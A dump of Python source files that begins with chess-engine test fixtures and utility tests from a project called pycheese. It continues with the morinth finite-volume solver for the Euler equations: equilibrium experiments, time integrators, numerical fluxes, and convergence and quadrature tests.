"target_coord": [2, 0],
"promotion_target": None,
"output": {
'state': 'ongoing',
'source_coord': {'x': 4, 'y': 0},
'target_coord': {'x': 2, 'y': 0},
'event': {'type': 'castle', 'extra': 'queenside'}
}
},
]
def case_and_king_queen_stalemate():
return [
{
"source_coord": [0, 1],
"target_coord": [5, 1],
"promotion_target": None,
"output": {
'state': 'stalemate',
'source_coord': {'x': 0, 'y': 1},
'target_coord': {'x': 5, 'y': 1},
'event': {'extra': 'unique', 'type': 'move'}
}
}
]
def case_promotion_empty():
return [
{
"source_coord": [0, 1],
"target_coord": [0, 0],
"promotion_target": "Knight",
"output": {
'state': 'draw',
'source_coord': {'x': 0, 'y': 1},
'target_coord': {'x': 0, 'y': 0},
'event': {'extra': 'Knight', 'type': 'promotion'}
}
}
]
def case_promotion_empty_bishop_draw():
return [
{
"source_coord": [0, 1],
"target_coord": [0, 0],
"promotion_target": "Bishop",
"output": {
'state': 'draw',
'source_coord': {'x': 0, 'y': 1},
'target_coord': {'x': 0, 'y': 0},
'event': {'extra': 'Bishop', 'type': 'promotion'}
}
}
]
def case_promotion_empty_bishop_no_draw():
return [
{
"source_coord": [0, 1],
"target_coord": [0, 0],
"promotion_target": "Bishop",
"output": {
'state': 'ongoing',
'source_coord': {'x': 0, 'y': 1},
'target_coord': {'x': 0, 'y': 0},
'event': {'extra': 'Bishop', 'type': 'promotion'}
}
}
]
def case_promotion_checkmate_empty():
return [
{
"source_coord": [0, 1],
"target_coord": [0, 0],
"promotion_target": "Queen",
"output": {
'state': 'checkmate',
'source_coord': {'x': 0, 'y': 1},
'target_coord': {'x': 0, 'y': 0},
'event': {'extra': 'Queen', 'type': 'promotion'}
}
}
]
def case_check_by_castle():
return [
{
"source_coord": [4, 7],
"target_coord": [6, 7],
"promotion_target": None,
"output": {
'state': 'check',
'source_coord': {'x': 4, 'y': 7},
'target_coord': {'x': 6, 'y': 7},
'event': {'type': 'castle', 'extra': 'kingside'}
}
}
]
```
#### File: pycheese/test/test_utils.py
```python
from pycheese.core.utils import Boundary
from pycheese.core.utils import coord_to_dict
from pycheese.core.utils import dict_to_coord
from test.utils import assert_obj_attr
def test_boundary():
"""Test the Boundary class function.
Check if the functions's behavoir is correct.
To do so initialize an instance of the Boundary class
and assert the functions output with different setups.
"""
min, max = 0, 10
boundary = Boundary(min, max)
# Test the attributes.
assert_obj_attr(boundary, "min", min)
assert_obj_attr(boundary, "max", max)
# Test if a boundary behaves correctly with single int.
assert boundary.accepts(min)
for i in range(min, max):
assert boundary.accepts(i)
assert not boundary.accepts(max)
# Test if a boundary behaves correctly with list of int.
for i in range(min, max):
for j in range(min, max):
assert boundary.accepts([i, j])
assert not boundary.accepts([max, max])
assert Boundary(min, min).accepts(min)
def test_coord_to_dict():
x, y = 0, 0
# Test conversion of single coord.
coord = [x, y]
dict = {"x": x, "y": y}
assert coord_to_dict(coord) == dict
# Test conversion of list of coord.
coord = [[x, y]]*2
dict = [dict, dict]
assert coord_to_dict(coord) == dict
# Test special case with empty list.
assert coord_to_dict([]) == []
def test_dict_to_coord():
x, y = 0, 0
# Test conversion of single dict.
dict = {"x": x, "y": y}
coord = [x, y]
assert dict_to_coord(dict) == coord
assert dict_to_coord(dict, as_list=True) == [coord]
# Test conversion of list of coord.
dict = [dict, dict]
coord = [[x, y]]*2
assert dict_to_coord(dict) == coord
assert dict_to_coord(dict, as_list=True) == coord
# Test special case with empty list.
assert dict_to_coord([]) == []
``` |
{
"source": "1uc/morinth",
"score": 2
} |
#### File: 1uc/morinth/gaussian_bump.py
```python
import numpy as np
from matplotlib import rcParams
# matplotlib.rc('text', usetex = True)
rcParams.update({ 'font.family': 'sans-serif',
'font.size': 15,
'xtick.labelsize': 15,
'ytick.labelsize': 15,
'figure.autolayout': True,
'axes.formatter.limits': (-1, 3)})
import matplotlib.pyplot as plt
import pickle
from morinth.equilibrium import IsothermalEquilibrium, IsentropicEquilibrium
from morinth.euler_experiment import EulerExperiment
from morinth.boundary_conditions import Outflow, HydrostaticOutflow
from morinth.visualize import EquilibriumGraphs, DensityGraph, ConvergencePlot, DumpToDisk
from morinth.visualize import CombineIO, EulerGraphs, Markers
from morinth.weno import OptimalWENO, EquilibriumStencil
from morinth.source_terms import BalancedSourceTerm, UnbalancedSourceTerm
from morinth.math_tools import gaussian, l1_error, l1rel_error, linf_error, convergence_rate
from morinth.time_keeper import FixedSteps, PlotNever, PlotLast
from morinth.quadrature import GaussLegendre
from morinth.coding_tools import with_default
from morinth.latex_tables import LatexConvergenceTable
from morinth.euler import LinearGravity, PointMassGravity
from morinth.gaussian_bump import GaussianBumpIC, ExtremeGaussianBumpIC
class EquilibriumExperiment(EulerExperiment):
@property
def gravity(self):
return 1.0
@property
def n_cells(self):
return self._n_cells
@n_cells.setter
def n_cells(self, rhs):
self._n_cells = rhs
@property
def order(self):
return 5
@property
def weno(self):
mode = self.well_balancing
if mode == "wb_o2" or mode == "wb_o4":
return OptimalWENO(EquilibriumStencil(self.grid, self.equilibrium, self.model))
elif mode == "naive":
return OptimalWENO()
else:
raise Exception("Wrong `well_balancing`.")
@property
def thermodynamic_equilibrium(self):
label = self._thermodynamic_equilibrium
if label == "isentropic":
return IsentropicEquilibrium
elif label == "isothermal":
return IsothermalEquilibrium
else:
raise Exception("Unknown equilibrium.")
@thermodynamic_equilibrium.setter
def thermodynamic_equilibrium(self, rhs):
self._thermodynamic_equilibrium = rhs
@property
def boundary_condition(self):
equilibrium = self.thermodynamic_equilibrium(self.grid, self.model)
return HydrostaticOutflow(self.grid, equilibrium)
@property
def source(self):
mode = self.well_balancing
if mode == "wb_o2" or mode == "wb_o4":
source_order = 4.0 if mode == "wb_o4" else 2.0
return BalancedSourceTerm(self.grid, self.model,
self.equilibrium, source_order)
elif mode == "naive":
return UnbalancedSourceTerm(self.grid, self.model)
else:
raise Exception("Wrong `well_balancing`.")
@property
def well_balancing(self):
return self._well_balancing
@well_balancing.setter
def well_balancing(self, rhs):
self._well_balancing = rhs
@property
def equilibrium(self):
mode = self.well_balancing
if mode == "wb_o2" or mode == "wb_o4":
return self.thermodynamic_equilibrium(self.grid, self.model)
elif mode == "naive":
return None
else:
assert Exception("Wrong `well_balancing`.")
@property
def visualize(self):
back_ground = self.initial_condition.back_ground(self.grid)
graphs = EquilibriumGraphs(self.grid,
"img/" + self.output_filename,
self.model,
back_ground)
raw_data = DumpToDisk(self.grid, "data/" + self.output_filename, back_ground)
return CombineIO(graphs, raw_data)
@property
def output_filename(self):
pattern = self.base_filename + "-{:s}_{:s}_res{:05d}"
return pattern.format(self._thermodynamic_equilibrium,
self.well_balancing,
self.n_cells)
class GaussianBump(EquilibriumExperiment):
@property
def final_time(self):
return 8.0
@property
def specific_gas_constant(self):
return 0.01
@property
def domain(self):
return np.array([0, 500])
@property
def initial_condition(self):
equilibrium = self.thermodynamic_equilibrium(self.grid, self.model)
ic = ExtremeGaussianBumpIC(self.model, equilibrium)
ic.p_amplitude, ic.rho_amplitude = 1e-6, 1e-6
return ic
@property
def gravity(self):
return PointMassGravity(gravitational_constant=800.0,
mass=3000.0,
radius=1000.0)
@property
def base_filename(self):
return "extreme_gaussian_bump"
@property
def steps_per_frame(self):
return 5
class GaussianBumpConvergence(GaussianBump):
@property
def plotting_steps(self):
# return super().plotting_steps
return PlotLast()
class GaussianBumpReference(GaussianBumpConvergence):
@property
def well_balancing(self):
return "naive"
@property
def n_cells(self):
return 2**14 + 6
@property
def output_filename(self):
pattern = "extreme_gaussian_bump-{:s}"
return pattern.format(self._thermodynamic_equilibrium)
def compute_reference_solution(Experiment, thermodynamic_equilibrium):
experiment = Experiment()
experiment.thermodynamic_equilibrium = thermodynamic_equilibrium
grid = experiment.grid
u0 = experiment.initial_condition.back_ground(grid)
u_ref = experiment()
filename_base = "data/" + experiment.output_filename
np.save(filename_base + "_background.npy", u0)
np.save(filename_base + "_reference.npy", u_ref)
with open(filename_base + "_grid.pkl", 'wb') as f:
pickle.dump(grid, f)
def load_reference_solution(Experiment, thermodynamic_equilibrium):
experiment = Experiment()
experiment.thermodynamic_equilibrium = thermodynamic_equilibrium
filename_base = "data/" + experiment.output_filename
u0_ref = np.load(filename_base + "_background.npy")
u_ref = np.load(filename_base + "_reference.npy")
with open(filename_base + "_grid.pkl", 'rb') as f:
grid = pickle.load(f)
return u0_ref, u_ref, grid
def down_sample(u_fine, grid_fine, grid_coarse):
"""Compute cell-averages of `u_fine` on the coarse grid."""
if grid_fine.n_dims == 2:
raise Exception("Needs to be implemented.")
ngf = grid_fine.n_ghost
ngc = grid_coarse.n_ghost
ncf = grid_fine.n_cells[0] - 2*ngf
ncc = grid_coarse.n_cells[0] - 2*ngc
r = ncf // ncc
assert r*ncc == ncf
shape = (u_fine.shape[0], -1, r)
u_coarse = np.mean(u_fine[:,ngf:-ngf].reshape(shape), axis=-1)
return u_coarse
class EquilibriumConvergenceRates:
def __call__(self, Experiment, ExperimentReference, thermal_equilibrium):
all_errors, all_rates = [], []
all_labels = self.all_labels
if self.is_reference_solution_required:
compute_reference_solution(ExperimentReference, thermal_equilibrium)
for well_balancing in ["naive", "wb_o2", "wb_o4"]:
# for well_balancing in ["naive", "wb_o4"]:
# for well_balancing in ["wb_o2"]:
# for well_balancing in ["wb_o4"]:
error, rate, resolutions = self.compute_convergence(Experiment,
ExperimentReference,
thermal_equilibrium,
well_balancing)
all_errors += error
all_rates += rate
experiment = ExperimentReference()
experiment.thermodynamic_equilibrium = thermal_equilibrium
filename_base = "".join(["img/code-validation/",
experiment.base_filename,
"-{:s}".format(experiment._thermodynamic_equilibrium)])
latex_table = LatexConvergenceTable(all_errors,
all_rates,
resolutions-6,
all_labels)
latex_table.write(filename_base + ".tex")
plot = ConvergencePlot(self.trend_lines)
plot(all_errors, resolutions-6, all_labels)
plot.save(filename_base)
def compute_convergence(self, Experiment,
ExperimentReference,
thermal_equilibrium,
well_balancing):
u0_ref, u_ref, grid_ref = load_reference_solution(ExperimentReference,
thermal_equilibrium)
du_ref = u_ref - u0_ref
# plt.clf()
# marker = iter(Markers())
# self.plot_delta(grid_ref, u_ref, du_ref, None, next(marker))
resolutions = self.resolutions
err = np.empty((4, resolutions.size))
for l, res in enumerate(resolutions):
experiment = Experiment()
experiment.thermodynamic_equilibrium = thermal_equilibrium
experiment.well_balancing = well_balancing
experiment.n_cells = res
grid = experiment.grid
n_ghost = grid.n_ghost
u0 = experiment.initial_condition.back_ground(grid)
u = experiment()
du = u - u0
du_ref_c = down_sample(du_ref, grid_ref, grid)
# self.plot_delta(grid, u, du, du_ref_c, next(marker))
err[:,l] = l1rel_error(du[:,n_ghost:-n_ghost], du_ref_c, ref=u_ref)
# plt.show()
error_vars = self.error_vars
rates = [convergence_rate(err[k,...], resolutions-6) for k in error_vars]
errors = [err[k,...] for k in error_vars]
return errors, rates, resolutions
def plot_delta(self, grid, u, du, du_ref_c, marker):
n_ghost = grid.n_ghost
x = grid.cell_centers[:,0]
plt.plot(x, du[0,...], marker = marker)
class GaussianBumpConvergenceRates(EquilibriumConvergenceRates):
def __init__(self):
super().__init__()
self.all_labels = ["$\\rho_{(0)}$", "$E_{(0)}$",
"$\\rho_{(1)}$", "$E_{(1)}$",
"$\\rho_{(2)}$", "$E_{(2)}$"]
self.error_vars = [0, 3]
self.resolutions = 2**np.arange(4, 11) + 6
self.is_reference_solution_required = True
self.trend_lines = [5]
if __name__ == "__main__":
sim = GaussianBumpConvergenceRates()
# sim(GaussianBumpConvergence, GaussianBumpReference, "isothermal")
sim(GaussianBumpConvergence, GaussianBumpReference, "isentropic")
```
#### File: 1uc/morinth/shock_tube.py
```python
import numpy as np
from morinth.boundary_conditions import Outflow
from morinth.weno import StableWENO, OptimalWENO
from morinth.rusanov import Rusanov
from morinth.euler_experiment import EulerExperiment
class ShockTubeIC:
"""Toro's shock-tube."""
def __init__(self, model):
self.model = model
def __call__(self, grid):
u0 = np.empty((4, grid.cell_centers.shape[0]))
x_crit = 0.3
is_inside = grid.cell_centers[...,0] < x_crit
u0[0, ...] = np.where(is_inside, 1.0, 0.125)
u0[1, ...] = np.where(is_inside, 0.75, 0.0)
u0[2, ...] = 0.0
u0[3, ...] = np.where(is_inside, 1.0, 0.1)
return self.model.conserved_variables(u0)
class ShockTubeBase(EulerExperiment):
@property
def final_time(self):
return 0.2
@property
def n_cells(self):
return 1000
@property
def flux(self):
return Rusanov(self.model)
@property
def steps_per_frame(self):
return 30
@property
def boundary_condition(self):
return Outflow(self.grid)
@property
def initial_condition(self):
return ShockTubeIC(self.model)
@property
def needs_baby_steps(self):
return True
class ShockTubeO1(ShockTubeBase):
@property
def output_filename(self):
return "img/shock_tube-o1"
@property
def order(self):
return 1
class ENOShockTube(ShockTubeBase):
@property
def output_filename(self):
return "img/shock_tube-eno"
@property
def order(self):
return 3
class WENOShockTube(ShockTubeBase):
@property
def output_filename(self):
return "img/shock_tube-weno"
@property
def reconstruction(self):
return OptimalWENO()
@property
def order(self):
return 5
if __name__ == '__main__':
# all_solvers = [WENOShockTube()]
all_solvers = [ShockTubeO1(), ENOShockTube(), WENOShockTube()]
for shock_tube in all_solvers:
shock_tube()
```
#### File: src/morinth/advection.py
```python
import numpy as np
class Advection(object):
"""Simple advection equation."""
def __init__(self, velocity):
self.velocity = velocity
def flux(self, u, axis):
return self.velocity[axis]*u
def source(self, u, x):
return 0.0
def max_eigenvalue(self, u):
return np.max(np.abs(self.velocity))
```
#### File: src/morinth/algebraic_solvers.py
```python
import numpy as np
def fixpoint_iteration(f, x0, atol=1e-12, rtol=1e-12, maxiter=100, full_output=False):
info = {'n_eval': 1}
def is_converged(x0, fx0):
delta = np.abs(fx0 - x0)
return np.all(np.logical_or(delta < atol, delta/np.abs(x0) < rtol))
x = x0
fx = f(x)
iter = 1
while not is_converged(x, fx) and iter < maxiter:
x, fx = fx, f(fx)
info['n_eval'] += 1
iter += 1
if full_output:
return fx, info
else:
return fx
```
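A small usage sketch for `fixpoint_iteration`, assuming the module is importable as `morinth.algebraic_solvers` (matching the file path above):
```python
# Find the fixed point of cos(x), the Dottie number (~0.739085).
import numpy as np
from morinth.algebraic_solvers import fixpoint_iteration

x_star, info = fixpoint_iteration(np.cos, np.array([1.0]), full_output=True)
print(x_star, info["n_eval"])  # converges well within the default maxiter=100
```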
#### File: src/morinth/newton.py
```python
import numpy as np
import scipy.sparse.linalg as sparse_linalg
class Newton(object):
def __init__(self, boundary_mask):
self.mask = boundary_mask.reshape(-1)
def __call__(self, F, dF, x0):
x, Fx = x0.reshape((-1)), F(x0.reshape((-1)))
n_iter = 0
while not self.is_converged(x, Fx):
dF.evaluated_at(x)
delta = np.zeros_like(x)
delta, ret_code = sparse_linalg.gmres(dF.as_operator(), -Fx, delta, tol=1e-3)
assert ret_code == 0, "ret_code = " + str(ret_code)
x = x + delta
Fx = F(x)
n_iter += 1
return x.reshape(x0.shape)
def is_converged(self, x, Fx):
return np.all(np.abs(Fx[self.mask]) < 1e-3)
```
#### File: src/morinth/rusanov.py
```python
import numpy as np
class Rusanov(object):
"""Rusanov's numerical flux for hyperbolic PDEs."""
def __init__(self, model):
"""Create Rusanov's flux for `model` equations."""
self.model = model
def __call__(self, u_left, u_right, axis):
c = np.maximum(self.model.max_eigenvalue(u_left),
self.model.max_eigenvalue(u_right))
return 0.5*(self.model.flux(u_left, axis) + self.model.flux(u_right, axis)
- c*(u_right - u_left))
```
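The flux above only needs a model that exposes `flux` and `max_eigenvalue`, so it can be exercised with the `Advection` model from the previous file. A hedged sketch:
```python
# For a positive advection velocity the Rusanov flux reduces to upwinding.
import numpy as np
from morinth.advection import Advection
from morinth.rusanov import Rusanov

model = Advection(np.array([1.0]))
flux = Rusanov(model)

u_left = np.array([[1.0, 2.0]])   # one conserved variable at two interfaces
u_right = np.array([[2.0, 3.0]])
print(flux(u_left, u_right, axis=0))  # equals u_left, i.e. the upwind value
```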
#### File: src/morinth/testing_tools.py
```python
import numpy as np
import pytest
@pytest.fixture(autouse=True)
def pytest_config(request):
return request.config
def is_manual_mode(pytest_config):
return pytest_config.getoption("--manual-mode")
def pytest_collection_modifyitems(config, items):
    mark_manual = pytest.mark.skipif(not is_manual_mode(config),
                                     reason="pass `--manual-mode` to run this")
    # Assumption: manual tests opt in via a `manual` marker; apply the skip to them.
    for item in items:
        if "manual" in item.keywords:
            item.add_marker(mark_manual)
```
#### File: src/morinth/time_integration.py
```python
import numpy as np
from morinth.jacobian import ApproximateJacobian
from morinth.newton import Newton
from morinth.butcher import ButcherTableau
class TimeIntegration(object):
"""Interface for time-integration."""
def __init__(self, bc, rate_of_change):
self.bc = bc
self.rate_of_change = rate_of_change
class ExplicitTimeIntegration(TimeIntegration):
"""Base class for explicit solvers."""
def pick_time_step(self, u):
return self.cfl_number * self.rate_of_change.pick_time_step(u)
class ImplicitTimeIntegration(TimeIntegration):
"""Base class for implicit time integration."""
    def __init__(self, bc, rate_of_change, boundary_mask):
        super().__init__(bc, rate_of_change)
        self.epsilon = 1e-8
        # keep the mask around so __repr__ can report it
        self.boundary_mask = boundary_mask
        self.non_linear_solver = Newton(boundary_mask)
def __str__(self):
return type(self).__name__ + "(..)"
def __repr__(self):
return "".join([type(self).__name__,
"(bc = ", repr(self.bc), ", ",
"rate_of_change = ", repr(self.rate_of_change), ", ",
"boundary_mask = ", repr(self.boundary_mask), ")"])
class BackwardEuler(ImplicitTimeIntegration):
def __init__(self, bc, rate_of_change, boundary_mask, cfl_number):
super().__init__(bc, rate_of_change, boundary_mask)
self.cfl_number = cfl_number
def __call__(self, u0, t, dt):
F = self.NonlinearEquation(u0, t, dt, self.bc, self.rate_of_change)
dF = ApproximateJacobian(F, u0, self.epsilon)
u1 = self.non_linear_solver(F, dF, u0)
self.bc(u1, t+dt)
return u1
def pick_time_step(self, u):
return self.cfl_number * self.rate_of_change.pick_time_step(u)
class NonlinearEquation(object):
def __init__(self, u0, t, dt, bc, rate_of_change):
self.u0, self.t, self.dt = u0, t, dt
self.bc = bc
self.rate_of_change = rate_of_change
self.shape = u0.shape
def __call__(self, u):
u0, t, dt = self.u0, self.t, self.dt
u = u.reshape(self.shape)
# self.bc(u)
residual = u - (u0 + dt*self.rate_of_change(u, t+dt))
return residual.reshape((-1))
class BDF2(ImplicitTimeIntegration):
"""Backward differentiation formula with two steps.
The BDF2 is
u2 - 4/3 u1 + 1/3 u0 = 2/3 h f(t2, u2).
"""
def __init__(self, bc, rate_of_change, boundary_mask, fixed_dt):
super().__init__(bc, rate_of_change, boundary_mask)
self.backward_euler = BackwardEuler(bc, rate_of_change, boundary_mask, None)
self.u0 = None
self.fixed_dt = fixed_dt
def __call__(self, u1, t, dt):
        if self.u0 is None:
# The update from t=0 to t=dt must be done by BDF1.
self.u0 = u1
return self.backward_euler(self.u0, t, dt)
F = self.NonlinearEquation(self.u0, u1, t, dt, self.bc, self.rate_of_change)
dF = ApproximateJacobian(F, u1, self.epsilon)
u2 = self.non_linear_solver(F, dF, u1)
self.bc(u2, t + dt)
# store `u1` for use as `u0` in next iteration.
self.u0 = u1
return u2
def pick_time_step(self, u):
return self.fixed_dt
class NonlinearEquation(object):
def __init__(self, u0, u1, t, dt, bc, rate_of_change):
self.u0, self.u1, self.t, self.dt = u0, u1, t, dt
self.bc = bc
self.rate_of_change = rate_of_change
self.shape = u0.shape
def __call__(self, u):
u0, u1, t, dt = self.u0, self.u1, self.t, self.dt
u = u.reshape(self.shape)
self.bc(u, t + dt)
residual = u - 4/3*u1 + 1/3*u0 - 2/3*dt*self.rate_of_change(u, t+dt)
return residual.reshape((-1))
class DIRK(ImplicitTimeIntegration):
"""Diagonally implicit Runge-Kutta (DIRK) schemes.
DIRKs are implicit Runge-Kutta schemes where the only implicit terms
are on the diagonal.
References:
[1]: <NAME>, 1977, SIAM J. Num. Anal.
"""
def __init__(self, bc, rate_of_change, boundary_mask, cfl_number, tableau):
"""Create a DIRK object.
Parameters:
:bc: boundary conditions
:rate_of_change: right-hand side of the ODE
:boundary_mask: like in `ForwardEuler`
:tableau: a diagonally implicit Butcher tableau
"""
super().__init__(bc, rate_of_change, boundary_mask)
self.tableau = tableau
self.dudt_buffers = None
self.cfl_number = cfl_number
def __call__(self, u0, t, dt):
self.allocate_buffers(u0)
uj = u0
for j in range(self.tableau.stages):
F, dF = self.non_linear_equation(u0, t, dt, j)
uj = self.non_linear_solver(F, dF, uj)
self.bc(uj)
u1 = u0 + dt*np.sum(self.tableau.b*self.dudt_buffers, axis=-1)
self.bc(u1)
return u1
def allocate_buffers(self, u):
"""Allocate rate of change buffers if needed."""
shape = u.shape+(self.tableau.stages,)
if self.dudt_buffers is None or self.dudt_buffers.shape != shape:
self.dudt_buffers = np.zeros(shape)
def non_linear_equation(self, u0, t, dt, stage):
"""Return the non-linear equation and the Jacobian.
Arguments:
u0: approximation of u at time `t`.
t: current simulation time
dt: size of the time-step
stage: current stage of the DIRK
Return:
(F, dF): `F` is the non-linear equation.
`dF` is the Jacobian of `F`.
"""
F = self.NonlinearEquation(u0, t, dt, self.bc, self.rate_of_change,
self.tableau, self.dudt_buffers, stage)
dF = ApproximateJacobian(F, u0, self.epsilon)
return F, dF
def pick_time_step(self, u):
return self.cfl_number * self.rate_of_change.pick_time_step(u)
class NonlinearEquation(object):
def __init__(self, u0, t, dt, bc, rate_of_change, tableau, dudt_buffers, stage):
self.u0, self.t, self.dt = u0, t, dt
self.bc = bc
self.rate_of_change = rate_of_change
self.tableau = tableau
self.dudt_buffers = dudt_buffers
self.stage = stage
self.shape = u0.shape
s, k = stage, self.dudt_buffers
sm1 = max(0, s-1)
self.sum_k = np.sum(self.tableau.a[s,:sm1]*k[...,:sm1], axis=-1)
def __call__(self, u):
u0, t, dt = self.u0, self.t, self.dt
u = u.reshape(self.shape)
a, s, k = self.tableau.a, self.stage, self.dudt_buffers
dt_star = self.tableau.c[s]*dt
t_star = t + dt_star
k[...,s] = self.rate_of_change(u, t_star)
residual = u - (u0 + dt_star*(self.sum_k + a[s,s]*k[...,s]))
return residual.reshape((-1))
class DIRKa23(DIRK):
"""Two stage, third order, A-stable DIRK."""
def __init__(self, bc, rate_of_change, boundary_mask, cfl_number):
isqrt3 = 1.0/np.sqrt(3.0)
a11 = 0.5*(1.0 + isqrt3)
a21 = -isqrt3
a22 = 0.5*(1.0 + isqrt3)
a = np.array([[a11, 0.0], [a21, a22]])
b = np.array([0.5, 0.5])
tableau = ButcherTableau(a, b)
super().__init__(bc, rate_of_change, boundary_mask, cfl_number, tableau)
class DIRKa34(DIRK):
"""Three stage, fourth order, A-stable DIRK."""
def __init__(self, bc, rate_of_change, boundary_mask, cfl_number):
alpha = 2.0*np.cos(np.pi/18.0)/np.sqrt(3.0)
a11 = 0.5*(1 + alpha)
a21 = -0.5*alpha
a22 = 0.5*(1 + alpha)
a31 = 1 + alpha
a32 = -(1 + 2*alpha)
a33 = 0.5*(1 + alpha)
a = np.array([[a11, 0.0, 0.0],
[a21, a22, 0.0],
[a31, a32, a33]])
b = np.array([1.0/(6.0*alpha**2), 1.0 - 1.0/(3*alpha**2), 1.0/(6.0*alpha**2)])
tableau = ButcherTableau(a, b)
super().__init__(bc, rate_of_change, boundary_mask, cfl_number, tableau)
```
#### File: morinth/test/advection_test.py
```python
import numpy as np
import matplotlib.pylab as plt
from morinth.advection import Advection
from morinth.rusanov import Rusanov
from morinth.grid import Grid
from morinth.boundary_conditions import Periodic
from morinth.finite_volume_fluxes import FVMRateOfChange
from morinth.runge_kutta import ForwardEuler, Fehlberg
from morinth.time_loop import TimeLoop
from morinth.time_keeper import FixedDuration, PlotNever
from morinth.quadrature import GaussLegendre
from morinth.math_tools import l1_error, convergence_rate
from morinth.euler_experiment import AdvectionExperiment
from morinth.progress_bar import SilentProgressBar
from morinth.weno import OptimalWENO
import pytest
class PDE(object):
def __init__(self):
self.grid = Grid([[0.0, 1.0], [-1.0, -0.5]], [100, 20], 1)
self.model = Advection(np.array([1.0, 2.0]))
self.flux = Rusanov(self.model)
self.fvm = FVMRateOfChange(self.grid, self.flux, None, None)
self.bc = Periodic(self.grid)
def test_advection():
pde = PDE()
visualize = lambda u : None
plotting_steps = PlotNever()
single_step = ForwardEuler(pde.bc, pde.fvm)
simulation = TimeLoop(single_step, visualize, plotting_steps)
shape = (1,) + pde.grid.cell_centers.shape[:2]
u0 = (np.cos(2*np.pi*pde.grid.cell_centers[:,:,0])
* np.sin(2*np.pi*pde.grid.cell_centers[:,:,1])).reshape(shape)
time_keeper = FixedDuration(T = 0.3)
uT = simulation(u0, time_keeper);
assert np.all(np.isfinite(uT))
def smooth_pattern(x):
return np.sin(2.0*np.pi*x - 0.1)
class SineAdvection(AdvectionExperiment):
def __init__(self, n_cells, order):
self._order = order
self._n_cells = n_cells + self.n_ghost
self.cell_average = GaussLegendre(5)
@property
def final_time(self):
return 0.1
@property
def progress_bar(self):
return SilentProgressBar()
@property
def plotting_steps(self):
return PlotNever()
@property
def order(self):
return self._order
@property
def n_cells(self):
return self._n_cells
@property
def initial_condition(self):
return lambda grid: self.cell_average(grid.edges, smooth_pattern).reshape((1, -1))
@property
def velocity(self):
return np.array([2.34])
@property
def reference_solution(self):
t, v = self.final_time, self.velocity
return self.cell_average(self.grid.edges, lambda x: smooth_pattern(x - t*v)).reshape((1, -1))
# return smooth_pattern(self.grid.cell_centers - t*v).reshape((1, -1))
@property
def visualize(self):
return None
@property
def single_step(self):
_single_step = Fehlberg(self.boundary_condition, self.fvm)
self._single_step = getattr(self, "_single_step", _single_step)
return self._single_step
def test_convergence_rate():
all_resolutions = np.array([10, 20, 40, 80, 160, 320, 640])
weno = OptimalWENO()
err = np.empty(all_resolutions.size)
for k, resolution in enumerate(np.nditer(all_resolutions)):
simulation = SineAdvection(resolution, 5)
grid = simulation.grid
uT = simulation()
u_ref = simulation.reference_solution
# plt.clf()
# plt.plot(grid.cell_centers[:,0], uT[0,...])
# plt.hold(True)
# plt.plot(grid.cell_centers[:,0], u_ref[0,...])
# plt.show()
err[k] = l1_error(uT[:,3:-3], u_ref[:,3:-3])
rate = convergence_rate(err, all_resolutions-6)
assert np.abs(np.max(np.abs(rate)) - 5.0) < 0.1
# print("")
# print(err)
# print(convergence_rate(err, np.array(all_resolutions)-6))
```
#### File: morinth/test/quadrature_test.py
```python
import numpy as np
import scipy.integrate
from morinth.quadrature import GaussLegendre
from morinth.grid import Grid
def sinusoidal(x):
x = (x - 10.0)/100.0
fx = np.sin(2.0*np.pi*x) * np.cos(2.0*np.pi*x)**2
return fx
def quadrature_error(n_cells, n_points):
grid = Grid([10.0, 100.0], n_cells, 1)
integrate = GaussLegendre(n_points)
fbar = integrate(grid.edges, sinusoidal)
fref = np.empty(n_cells)
for i in range(n_cells):
fref[i], err = scipy.integrate.quadrature(sinusoidal, grid.edges[i], grid.edges[i+1],
tol = 1e-10, rtol=1e-10)
fref *= 1.0/grid.dx
return np.max(np.abs(fbar - fref))
def quadrature_rate(n_points):
resolutions = np.array([10, 20, 50, 100, 200, 500])
errors = np.array([quadrature_error(res, n_points) for res in np.nditer(resolutions)])
rate = np.max(np.abs(np.log(errors[1:]/errors[:-1])/np.log(resolutions[1:]/resolutions[:-1])))
return rate
def test_quadrature_vs_scipy():
for n_points in range(1,6):
empirical = quadrature_rate(n_points)
order = 2.0*n_points
assert empirical > order - 0.1, "{:.1f} vs. {:.1f}".format(empirical, float(order))
```
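The same `GaussLegendre`/`Grid` combination used in the test can be called directly to compute cell averages; a short sketch, assuming the import paths above:
```python
# Cell averages of sin(x) on a uniform grid with one ghost cell per side.
import numpy as np
from morinth.quadrature import GaussLegendre
from morinth.grid import Grid

grid = Grid([0.0, 1.0], 10, 1)
integrate = GaussLegendre(3)
averages = integrate(grid.edges, np.sin)
print(averages)
```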
#### File: morinth/test/source_terms_test.py
```python
import numpy as np
import matplotlib.pyplot as plt
from morinth.source_terms import BalancedSourceTerm, EquilibriumDensityInterpolation, UnbalancedSourceTerm
from morinth.grid import Grid
from morinth.euler import Euler, PointMassGravity
from morinth.equilibrium import IsothermalEquilibrium, IsentropicEquilibrium
from morinth.weno import OptimalWENO, EquilibriumStencil
from morinth.gaussian_bump import GaussianBumpIC
from morinth.quadrature import GaussLegendre
from morinth.math_tools import l1_error, linf_error, convergence_rate
from morinth.latex_tables import LatexConvergenceTable
from morinth.visualize import ConvergencePlot
import morinth.testing_tools as testing_tools
from morinth.testing_tools import pytest_config
def check_source_term_order(order, Equilibrium):
model = Euler(gamma=1.4, gravity = 1.2, specific_gas_constant=2.0)
quadrature = GaussLegendre(5)
all_resolutions = 2**np.arange(3, 11) + 6
err = np.empty((4, all_resolutions.size))
for l, res in enumerate(all_resolutions):
grid = Grid([0.0, 1.0], res, 3)
equilibrium = Equilibrium(grid, model)
ic = GaussianBumpIC(model, equilibrium)
ic.p_amplitude, ic.rho_amplitude = 0.0, 0.1
weno = OptimalWENO(EquilibriumStencil(grid, equilibrium, model))
source_term = BalancedSourceTerm(grid, model, equilibrium, order=order)
u_bar = ic(grid)
u_plus, u_minus = weno(u_bar, axis=0)
u_left, u_right = u_minus[:,:-1,...], u_plus[:,1:,...]
s_approx = source_term.edge_source(u_bar, u_left, u_right, axis=0)
S_momentum = lambda x: -ic.point_values(x)[0,...]*model.gravity.dphi_dx(x)
s_ref = np.zeros_like(s_approx)
s_ref[1,...] = quadrature(grid.edges[3:-3,...], S_momentum)
err[:, l] = linf_error(s_approx, s_ref)
rate = convergence_rate(err[1, ...], all_resolutions-6)
return err[1,...], rate, all_resolutions
def source_term_order(Equilibrium, label):
all_errors, all_rates = [], []
all_labels = ["$S_{(1)}$", "$S_{(2)}$"]
for order in [2, 4]:
errors, rates, resolutions = check_source_term_order(order, Equilibrium)
all_errors.append(errors)
